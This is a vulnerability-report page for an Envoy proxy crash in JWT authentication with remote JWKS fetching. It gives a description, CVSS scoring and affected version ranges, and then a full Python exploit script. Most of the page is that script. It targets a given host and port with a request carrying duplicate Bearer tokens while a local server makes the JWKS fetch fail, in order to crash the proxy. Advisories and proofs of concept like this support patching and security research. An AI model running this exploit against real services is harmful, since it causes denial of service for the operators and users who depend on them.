Security Vulnerability Report
CVE-2025-64527 CVSS 6.5 MEDIUM


Published: 2025-12-03 18:15:47
Last Modified: 2025-12-05 16:56:41

Description

Envoy is a high-performance edge/middle/service proxy. In 1.33.12, 1.34.10, 1.35.6, 1.36.2, and earlier, Envoy crashes when JWT authentication is configured with remote JWKS fetching, allow_missing_or_failed is enabled, multiple JWT tokens are present in the request headers, and the JWKS fetch fails. This is caused by a re-entry bug in JwksFetcherImpl. When the first token's JWKS fetch fails, the onJwksError() callback triggers processing of the second token, which calls fetch() again on the same fetcher object. The original callback's reset() then clears the second fetch's state (receiver_ and request_), which causes a crash when the async HTTP response arrives.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Weakness: CWE-476 (NULL Pointer Dereference)

Configurations (Affected Products)

cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:* - VULNERABLE

Affected version ranges (all four ranges match the CPE above):
Envoy Proxy 1.33.12 and earlier (fixed in 1.33.13)
Envoy Proxy 1.34.0 through 1.34.10 (fixed in 1.34.11)
Envoy Proxy 1.35.0 through 1.35.6 (fixed in 1.35.7)
Envoy Proxy 1.36.0 through 1.36.2 (fixed in 1.36.3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-64527 PoC - Envoy JWT JWKS Fetch Failure DoS

This PoC demonstrates the re-entry bug in JwksFetcherImpl that causes an
Envoy crash when multiple JWT tokens are present and the JWKS fetch fails.

Usage:
1. Set up Envoy with JWT authentication and a remote JWKS
2. Configure allow_missing_or_failed: true
3. Block or make the JWKS endpoint unreachable
4. Send a request with multiple JWT tokens
"""
import http.server
import socket
import socketserver
import sys
import threading
import time

# Malicious JWT tokens (any malformed tokens will trigger a JWKS fetch)
MALICIOUS_TOKENS = [
    "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.signature1",
    "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IlNhbiBMYWJvcmEiLCJpYXQiOjE1MTYyMzkwMjJ9.signature2",
]


def create_malicious_request(target_host, target_port):
    """Create an HTTP request carrying multiple JWT tokens to trigger the bug."""
    request = (
        "GET /protected-resource HTTP/1.1\r\n"
        f"Host: {target_host}:{target_port}\r\n"
        f"Authorization: Bearer {MALICIOUS_TOKENS[0]}\r\n"
        f"Authorization: Bearer {MALICIOUS_TOKENS[1]}\r\n"
        "User-Agent: CVE-2025-64527-PoC\r\n"
        "Accept: */*\r\n"
        "\r\n"
    )
    return request.encode()


def block_jwks_requests(server_host="127.0.0.1", server_port=8080):
    """Answer a single JWKS request with an error to simulate a fetch failure."""

    class BlockingHandler(http.server.BaseHTTPRequestHandler):
        def do_GET(self):
            if "/.well-known/jwks.json" in self.path:
                # Return an error to trigger the onJwksError callback
                self.send_response(500)
                self.end_headers()
                self.wfile.write(b'{"error": "Internal Server Error"}')
            else:
                self.send_response(404)
                self.end_headers()

        def log_message(self, format, *args):
            pass  # Suppress logging

    with socketserver.TCPServer((server_host, server_port), BlockingHandler) as httpd:
        httpd.handle_request()


def exploit(target_host, target_port):
    """Send the malicious request to trigger the Envoy crash."""
    # Start the JWKS blocking server in the background
    blocker_thread = threading.Thread(target=block_jwks_requests)
    blocker_thread.daemon = True
    blocker_thread.start()
    time.sleep(0.5)

    # Send the malicious request
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_host, target_port))
        sock.sendall(create_malicious_request(target_host, target_port))
        response = sock.recv(4096)
        sock.close()
        print("[+] Request sent. Envoy may crash.")
        print(f"[*] Response: {response[:200]}")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <target_host> <target_port>")
        sys.exit(1)
    exploit(sys.argv[1], int(sys.argv[2]))
```

References

https://github.com/envoyproxy/envoy/security/advisories/GHSA-mp85-7mrq-r866 (Vendor Advisory, Exploit)